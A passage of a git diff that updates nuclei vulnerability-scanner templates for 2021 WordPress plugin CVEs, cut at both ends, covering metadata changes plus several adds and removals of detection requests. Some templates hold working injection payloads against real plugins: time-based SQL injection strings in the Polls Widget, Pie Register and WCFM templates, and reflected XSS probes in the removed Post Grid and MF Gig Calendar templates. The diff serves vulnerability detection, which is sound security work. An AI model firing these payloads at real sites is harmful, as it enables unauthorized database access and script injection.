https://wordpress.org/plugins/polls-widget/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24442 + cwe-id: CWE-89 + epss-score: 0.00212 + epss-percentile: 0.58237 + cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: wpdevart + product: poll\,_survey\,_questionnaire_and_voting_system + framework: wordpress + publicwww-query: "/wp-content/plugins/polls-widget/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/polls-widget/readme.txt' +http: + - raw: + - | + @timeout: 25s + POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Forwarded-For: {{randstr}} - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5) - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "wpdevart" - part: body - - type: dsl dsl: - - compare_versions(version, '< 1.5.3') \ No newline at end of file + - 'duration>=5' + - 'status_code == 200' + - 'contains_all(body, "{\"answer_name", "vote\":")' + condition: and +# digest: 4a0a0047304502200a19043d7f0d2e1b48cc9b1ae8f2e1b84ac62c18df00ab187a07eb5f98ba5f17022100a48e6060c3f50a27b56f3505e1fa0b6480e1059eda4dcb34d325573dcb4743cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24452.yaml b/nuclei-templates/CVE-2021/CVE-2021-24452.yaml index abc601b9b1..6788b79fdb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24452.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24452.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.5. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 @@ -17,7 +19,7 @@ info: cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40981 + epss-percentile: 0.4078 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid http: - raw: @@ -46,4 +48,4 @@ http: - contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache') - contains(header_2, "text/html") condition: and -# digest: 4a0a00473045022100d4803d25dcb8a74dd2b0742b3c8f37fdfc9c280d16e68cd18f79ff6baa53105c02200f24876be246a30206387b4d18152a6c6cf4f68cd1d9d1b293b42474f5e58ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b2db738722a6a6e1cf4aa896871e333bccd3809069eeb42e599a6549a6a4cc80221008351b510b897929c71b87698098af6cc925f9e1328c8e1f63b39b87de2dd6fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24472.yaml b/nuclei-templates/CVE-2021/CVE-2021-24472.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24472.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24472.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24488.yaml b/nuclei-templates/CVE-2021/CVE-2021-24488.yaml deleted file mode 100644 index 227a6f412a..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24488.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-24488 - -info: - name: WordPress Plugin Post Grid < 2.1.8 - XSS - author: cckuailong - severity: medium - description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues - reference: - - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a - - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24488 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="\"onmouseover=alert(document.domain)/">' - - 'Post Grid' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24495.yaml b/nuclei-templates/CVE-2021/CVE-2021-24495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24495.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24507.yaml b/nuclei-templates/CVE-2021/CVE-2021-24507.yaml index dbd5ed6b3b..1e25f53bcc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24507.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24507.yaml @@ -1,47 +1,58 @@ id: CVE-2021-24507 + info: - name: Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection - author: princechaddha,cognnn + name: > + Astra Pro Addon <= 3.5.1 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues + description: > + The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues reference: - - https://wpscan.com/vulnerability/a1a0dc0b-c351-4d46-ac9b-b297ce4d251c - - https://nvd.nist.gov/vuln/detail/CVE-2021-24507 - tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,unauth,astra-pro - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - action=astra_shop_pagination_infinite&nonce={{nonce}}&query_vars=%7B%22tax_query%22%3A%7B%220%22%3A%7B%22field%22%3A%22term_taxonomy_id%22%2C%22terms%22%3A%5B%229656%29%29+and+%28%287556%3D1223%22%5D%7D%7D%7D&astra_infinite=astra_pagination_ajax&page_no=1 - - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - action=astra_shop_pagination_infinite&nonce={{nonce}}&query_vars=%7B%22tax_query%22%3A%7B%220%22%3A%7B%22field%22%3A%22term_taxonomy_id%22%2C%22terms%22%3A%5B%229634%29%29+or+%28%286532%3D6532%22%5D%7D%7D%7D&astra_infinite=astra_pagination_ajax&page_no=1 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec3dd825-bee3-4d09-bc98-aff665988641?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24507 + metadata: + fofa-query: "wp-content/plugins/astra-addon/" + google-query: inurl:"/wp-content/plugins/astra-addon/" + shodan-query: 'vuln:CVE-2021-24507' + tags: cve,wordpress,wp-plugin,astra-addon,critical +http: + - method: GET redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - "len(body_2)==0 && len(body_3)>len(body_2)" + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/astra-addon/readme.txt" extractors: - type: regex + name: version part: body - name: nonce + group: 1 internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body group: 1 regex: - - 'infinite_nonce":"(.+?)",' + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "astra-addon" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24510.yaml b/nuclei-templates/CVE-2021/CVE-2021-24510.yaml deleted file mode 100644 index a6edca5010..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24510.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-24510 - -info: - name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS) - author: dhiyaneshDK - severity: medium - description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue - reference: - - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24510 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-24510 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2021/CVE-2021-24554.yaml b/nuclei-templates/CVE-2021/CVE-2021-24554.yaml index 80d356ad9f..eb76bcf50c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24554.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24554.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-paytm-pay/ - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24554 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.17174 - epss-percentile: 0.95563 + epss-score: 0.20268 + epss-percentile: 0.95935 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: freelancetoindia product: paytm-pay framework: wordpress - tags: cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,cve + tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia http: - raw: @@ -50,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and -# digest: 4b0a00483046022100cb123a938c7fa83dfac86c0da159fbe444e947a8d1c986438e62b028b7a819d9022100ad49330a947ab757f0a6c87872b2976ab01914680d7457d4d9b94076b20a37cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206761ba0bbf5025dd6acebce6ae4c00348e7a0c42d2dabe4f89025ddf1f64856802200b643eb17601d207edb76a789e0506dab04b0d1e4d81a8cef2106f21c6234377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24627.yaml b/nuclei-templates/CVE-2021/CVE-2021-24627.yaml index 423779681a..23ec47cec5 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24627.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24627.yaml @@ -10,13 +10,14 @@ info: - https://wordpress.org/plugins/g-auto-hyperlink/ - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb - https://nvd.nist.gov/vuln/detail/CVE-2021-24627 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24627 cwe-id: CWE-89 - epss-score: 0.14566 - epss-percentile: 0.95208 + epss-score: 0.14515 + epss-percentile: 0.95609 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: product: g_auto-hyperlink framework: wordpress publicwww-query: /wp-content/plugins/g-auto-hyperlink/ - tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated + tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 @@ -59,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c586258619df1c818f9744c079291bf09c6538899174801dc207276382215099022100f246c2c83089282cab1b74a5edd0340011091aeae4139a7aa68003a90e7a81e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bdb4a94865f92c4bfb19042de1f21fae7eebca1adb86abff97ff76e2b8a8343002202507f1d079f5aad3bf0c38a5bed17afdc4c7d599611392cc29897c83b6be1425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24647.yaml b/nuclei-templates/CVE-2021/CVE-2021-24647.yaml index e66680672a..c5ea07681d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24647.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24647.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + impact: | + An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information. remediation: Fixed in version 3.7.1.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-24647 @@ -16,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2021-24647 cwe-id: CWE-287 - epss-score: 0.2135 - epss-percentile: 0.95938 + epss-score: 0.22598 + epss-percentile: 0.96397 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp + tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions http: - raw: @@ -50,4 +52,4 @@ http: - 'contains(body_1, "pieregister")' - 'contains(body_3, "Username") && contains(body_3, "email-description")' condition: and -# digest: 490a0046304402206da7c1db19cc38f0a75883ff2a405f97d55c0241e40fde46e033149ad35d638202203087903b931a12cdda39b73fdf99f8768b7c00d82a9d2b7d305bcc8634127ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220204302541a5adc4eb84fc50fb71121e7140fda5e325560f2bc6af782c3aca218022100ab9e70ee88a95d91743d26f6f03d095cacd2446df954554ebd5977cd1815c210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24666.yaml b/nuclei-templates/CVE-2021/CVE-2021-24666.yaml index 69d16e2f8f..542c26187d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24666.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24666.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 - epss-score: 0.23542 - epss-percentile: 0.96096 + epss-score: 0.28174 + epss-percentile: 0.96727 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: podlove product: podlove_podcast_publisher framework: wordpress - tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve + tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ae3ddbff5f8e43b5c547e35a3c5755f0a9b14706ee445a41dac7d10c87eb9b5022100853e1aad8b4fa8f3dcf3a23bdb86a896bda4eea99afb79f64f937b0289e93f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026044c3717272e2e8420ed333438950d1278ecd387d98be83b17a4e221c88061022100f29de45026c0ac79f866c24c10ac02390cb7b01c5b01472839be278f0b677522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24731.yaml b/nuclei-templates/CVE-2021/CVE-2021-24731.yaml index 9fe966162c..34085ea7cf 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24731.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24731.yaml @@ -1,43 +1,50 @@ id: CVE-2021-24731 info: - name: Pie Register < 3.7.1.6 - Unauthenticated SQL Injection - author: akincibor + name: Pie Register < 3.7.1.6 - SQL Injection + author: theamanrawat severity: critical - description: The plugin does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + description: | + The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: Fixed in version 3.7.1.6 reference: - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wordpress.org/plugins/pie-register/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24731 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24731 + cwe-id: CWE-89 + epss-score: 0.14786 + epss-percentile: 0.95651 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + metadata: + verified: "true" + max-request: 1 + vendor: genetechsolutions + product: pie_register + framework: wordpress + tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/pie-register/readme.txt' +http: + - raw: + - | + @timeout: 10s + POST /wp-json/pie/v1/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Registration Forms" - part: body - - type: dsl dsl: - - compare_versions(version, '< 3.7.1.6') \ No newline at end of file + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains(body, "User credentials are invalid.")' + condition: and +# digest: 4b0a00483046022100fce3161626802d300b9a7d01b3d0b39df2f76c16556c4cd0f1f0f331408796bf022100f4a95c3a1fee3e3a75c2105e41b3554e20ce5802440a244a4f7cab3280f3178f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24750.yaml b/nuclei-templates/CVE-2021/CVE-2021-24750.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24750.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24750.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24791.yaml b/nuclei-templates/CVE-2021/CVE-2021-24791.yaml index f2042479b4..f883fd42cc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24791.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24791.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24791 cwe-id: CWE-89 epss-score: 0.10363 - epss-percentile: 0.944 + epss-percentile: 0.94849 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager + tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress http: - raw: @@ -49,4 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2,"Add New Snippet")' condition: and -# digest: 4a0a00473045022100d48f9ed571eaf5aa781a765e3288810a026de6ad427a26444f4852fcc4391e1802204b6030f2e8c41b532bc75cd2ac83add101e801eb13c38f0e1b0c005f59c205d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24827.yaml b/nuclei-templates/CVE-2021/CVE-2021-24827.yaml index e2582bf98a..b5fcefc9e4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24827.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24827.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. + remediation: | + Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 - https://wordpress.org/plugins/asgaros-forum/ @@ -16,11 +20,18 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 + epss-score: 0.11843 + epss-percentile: 0.94798 + cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli + verified: true + max-request: 1 + vendor: asgaros + product: asgaros_forum + framework: wordpress + tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros -requests: +http: - raw: - | @timeout: 15s @@ -35,5 +46,4 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4a0a0047304502204abd65cd69b3643e17793039bcb1df79c03f29ed1e031e0ae09f57d30b48a2eb022100cb2c0863ead3cbed3b58da963a5fe5581155c01b4aebcc1a1bbfc5404a1a6a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24849.yaml b/nuclei-templates/CVE-2021/CVE-2021-24849.yaml index 02114d86a2..8709514ac1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24849.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24849.yaml @@ -1,43 +1,69 @@ id: CVE-2021-24849 info: - name: WCFM - WooCommerce Multivendor Marketplace < 3.4.12 - Unauthenticated SQL Injection - author: akincibor + name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection + author: ritikchaddha severity: critical - description: The wcfm_ajax_controller AJAX action of the plugin, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. + description: | + The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections. + remediation: Fixed in 3.4.12 reference: - - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24849 + - https://wordpress.org/plugins/wc-multivendor-marketplace/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24849 + cwe-id: CWE-89 + epss-score: 0.02367 + epss-percentile: 0.89583 + cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: wclovers + product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" + framework: wordpress + publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli +flow: http(1) && http(2) -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wc-multivendor-marketplace/readme.txt' +http: + - raw: + - | + GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1 + Host: {{Hostname}} - extractors: - - type: regex - name: version + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce") + condition: and internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + - raw: + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - matchers-condition: and - matchers: - - type: status - status: - - 200 + {{post_data}} - - type: word - words: - - "WCFM Marketplace" - part: body + payloads: + post_data: + - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--" + - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`" + stop-at-first-match: true + matchers: - type: dsl dsl: - - compare_versions(version, '< 3.4.12') \ No newline at end of file + - 'duration>=5' + - 'status_code == 200' + - 'contains(header, "application/json")' + - 'contains(body, "success")' + condition: and +# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24862.yaml 